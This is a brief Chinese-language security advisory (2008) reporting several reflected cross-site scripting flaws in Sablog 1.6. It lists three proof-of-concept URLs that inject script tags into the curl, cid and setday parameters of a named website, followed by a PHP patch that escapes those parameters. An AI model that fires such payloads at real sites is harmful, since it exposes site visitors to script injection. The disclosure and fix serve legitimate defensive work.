Date:2008-03-27
Author:amxku[c.r.s.t]
Version:sablog 1.6
由于过滤不严,存在多个跨站漏洞
PS:
http://www.luoq.net/?viewmode=list&curl=>"><ScRiPt%20%0a%0d>alert(amxku)%3B</ScRiPt>
http://www.luoq.net/?action=index&cid=>"><ScRiPt%20%0a%0d>alert(amxku)%3B</ScRiPt>
http://www.luoq.net/?action=index&setdate=200804&setday=>"><ScRiPt%20%0a%0d>alert(amxku)%3B</ScRiPt>&page=1
临时解决办法:
在global.php中过滤curl,cid,setday等
- $modelink = '';
- if ($action) {
- $modelink .= '&action='.$action;
- }
- if ($curl) {
- $modelink .= '&curl='.htmlspecialchars($curl);
- }
- if ($cid) {
- $modelink .= '&cid='.htmlspecialchars($cid);
- }
- if ($setdate) {
- $modelink .= '&setdate='.htmlspecialchars($setdate);
- }
- if ($setday) {
- $modelink .= '&setday='.htmlspecialchars($setday);
- }
- if (intval($_GET['searchid'])) {
- $modelink .= '&searchid='.htmlspecialchars($_GET['searchid']);
- }
- if (intval($_GET['userid'])) {
- $modelink .= "&userid=".htmlspecialchars($_GET['userid']);
- }
- if ($_GET['item']) {
- $item = urlencode(addslashes($item));
- $modelink .= '&item='.$item;
- }